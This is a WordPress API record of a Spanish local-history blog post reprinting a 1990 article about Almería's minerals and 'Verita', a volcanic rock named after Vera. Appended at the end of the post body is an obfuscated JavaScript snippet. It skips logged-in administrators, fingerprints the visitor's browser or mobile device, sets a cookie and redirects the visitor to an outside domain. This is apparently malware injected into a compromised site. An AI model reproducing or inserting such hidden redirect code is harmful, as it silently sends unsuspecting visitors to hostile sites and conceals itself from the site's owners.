{"id":862,"date":"2015-01-14T12:46:47","date_gmt":"2015-01-14T12:46:47","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=862"},"modified":"2018-10-15T11:47:38","modified_gmt":"2018-10-15T11:47:38","slug":"verita-una-roca-exclusiva-de-vera","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2015\/01\/14\/verita-una-roca-exclusiva-de-vera\/","title":{"rendered":"VERITA. UNA ROCA EXCLUSIVA DE VERA"},"content":{"rendered":"<p>Creo que fue Siret, el arque\u00f3logo belga tan vinculado a Vera a trav\u00e9s de D. Juan Cuadrado, como todo el mundo sabe, quien dijo que \u201csi a la provincia de Almer\u00eda le pusieran un techo, resultar\u00eda un impresionante museo arqueol\u00f3gico\u201d.<\/p>\n<p><!--more--><\/p>\n<p>Y esto es tan cierto como que tambi\u00e9n se obtendr\u00eda de paso un museo de mineralog\u00eda como no habr\u00eda otro en el mundo, porque en el suelo de nuestra provincia, tan antiguo y tan modificado desde hace millones de a\u00f1os por sacudidas s\u00edsmicas y erupciones volc\u00e1nicas, existen pr\u00e1cticamente m\u00e1s del 75% de las casi dos mil especies minerales conocidas por el hombre. Y adem\u00e1s, como las agrupaciones de muchos de ellos proporcionan una gama de combinaciones y mezclas que llamamos rocas (\u201cagregados naturales de diferentes especies minerales\u201d) tan sugestivas, ricas y polimorfas, es muy probable no se haya dicho todav\u00eda la \u00faltima palabra en cuanto a variedad de rocas volc\u00e1nicas en muchos lugares de la provincia.<\/p>\n<p>Los silicatos son la clase mineral m\u00e1s abundante de la Naturaleza. La casi totalidad de los minerales de las rocas originadas en el magma profundo bajo la corteza terrestre son silicatos y as\u00ed, estas rocas forman el 90% de la misma. (Y antes de seguir, como cosa curiosa, diremos que el silicato m\u00e1s abundante y caracter\u00edstico del mundo se llama Andalucita. Divertido, \u00bfno?). La mineralog\u00eda es una forma de aprovechamiento de bienes naturales tan antigua como el hombre, que busc\u00f3 desde los primeros tiempos lugares donde abundase el hierro, el cobre, el esta\u00f1o, la plata, el oro y m\u00e1s modernamente el mercurio, la sal, el petr\u00f3leo, el aluminio, el uranio y tantos y tantos m\u00e1s.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/lava.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-3687\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/lava.jpg\" alt=\"\" width=\"258\" height=\"195\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/imag0428_162-verita.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-3686\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/imag0428_162-verita-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/imag0428_162-verita-300x200.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/imag0428_162-verita-272x182.jpg 272w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/imag0428_162-verita.jpg 750w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/detalle_137-VERITA.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-3685\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/detalle_137-VERITA-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/detalle_137-VERITA-300x225.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/detalle_137-VERITA.jpg 750w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Aunque nuestra provincia fue en tiempos remotos explotada por griegos, fenicios, cartagineses y romanos, entre otros, por la plata y otros metales preciosos, fue en el XIX cuando ge\u00f3logos e ingenieros de minas de toda Europa vinieron a Almer\u00eda para investigar sus tierras para calcular su riqueza mineral. Y descubrieron nuevas especies, como por ejemplo la Jarosita, un sulfato de hierro de Sierra Almagrera asociado a la Limonita y otros minerales de hierro, encontrado despu\u00e9s en Riotinto, Utiel y Nu\u00e9valo (Zaragoza), o el arseniato Cabrerita, que es una alteraci\u00f3n de la Niquelita y otros minerales de N\u00edquel, localizado tambi\u00e9n en Vimbodi (Tarragona), o la Almeriita, sulfato descubierto en 1905 en Adra con Calafatita y en Rodalquilar y Benahadux con Alunita. Y la muy peculiar Rodalquilarita, halogenuro de hierro que acompa\u00f1a al Oro y la Jarusita, como probable alteraci\u00f3n de los telururos de oro con cuarzo, cuyo yacimiento en Rodalquilar es hasta ahora \u00fanico en el mundo.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/verita.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3688\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/verita-277x300.jpg\" alt=\"\" width=\"277\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/verita-277x300.jpg 277w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2015\/01\/verita.jpg 750w\" sizes=\"(max-width: 277px) 100vw, 277px\" \/><\/a><\/p>\n<p>Y aqu\u00ed viene Vera. A 6 Kms. al SO de Vera, donde se alza el Cerro Negro, \u00e9ste y unos manchones aislados hacia Levante son los restos de una corriente de lavas oscuras que corrieron unos 8 Kms. a partir del Cerro en una erupci\u00f3n relativamente reciente sobre terrenos arcilloso-calizos de color claro de la era Terciaria. Todas esas lavas, como las del Cabo de Gata, oscuras y modernas, son Limburgitas, a base de Olivino y Mica englobadas en una pasta amorfa de cristales diminutos. Pero nada menos que el Dr. Ossan, ayudante del Instituto de Mineralog\u00eda de Heidelberg, m\u00e1xima autoridad geol\u00f3gica mundial de fines del XIX, en su segunda comunicaci\u00f3n sobre las rocas eruptivas del Cabo de Gata (1), describe las particularidades de esas Limburgitas pr\u00f3ximas a Vera y apoy\u00e1ndose en \u201c<i>la gran proporci\u00f3n de Mica tanto en cristales diseminados como en la pasta fundamental, el aspecto de Di\u00f3psido que ofrece su Piroxeno, su estructura v\u00edtreo-porf\u00eddica y su parecido con los lampr\u00f3fidos oliv\u00ednicos (\u201cminettas\u201d) de \u00e9pocas ante-terciarias<\/i>\u201d, define una nueva especie de roca a la que da el nombre de VERITA por su localizaci\u00f3n.<\/p>\n<p>\u00bfQui\u00e9n de Vera no va a darse una vuelta por el lugar, buscar\u00e1 un buen ejemplar de medio kilo de peso y lo colocar\u00e1 en su mesa de trabajo o sobre el chinero para presumir ante los amigos de tener una roca \u00fanica en el mundo llamada VERITA? Y si me mandan una muestra, tengan la absoluta seguridad que yo tambi\u00e9n, como almeriense, presumir\u00e9 con ella.<\/p>\n<p align=\"RIGHT\"><i>Beitrage zur Kenntniss der Eruptivgesteine der <\/i><\/p>\n<p align=\"RIGHT\"><i>Cabo de Gata (prov. Almer\u00eda). \u201cZeitschr. d. <\/i><\/p>\n<p align=\"RIGHT\"><i>Deutsch. Geolog. Gessellschaft\u201d 1889.<\/i><\/p>\n<p align=\"RIGHT\">Jos\u00e9 M. Artero<\/p>\n<p align=\"RIGHT\">Revista Vera 30, n\u00ba 4, abril 1990<\/p>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Creo que fue Siret, el arque\u00f3logo belga tan vinculado a Vera a trav\u00e9s de D. Juan Cuadrado, como todo el mundo sabe, quien dijo que \u201csi a la provincia de Almer\u00eda le pusieran un techo, resultar\u00eda un impresionante museo arqueol\u00f3gico\u201d.<\/p>\n","protected":false},"author":7,"featured_media":863,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[38,41,39,40],"class_list":["post-862","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-archivo","tag-geologia","tag-jose-m-artero","tag-mineralogia","tag-verita"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/862","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=862"}],"version-history":[{"count":4,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/862\/revisions"}],"predecessor-version":[{"id":3690,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/862\/revisions\/3690"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/863"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=862"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=862"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=862"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}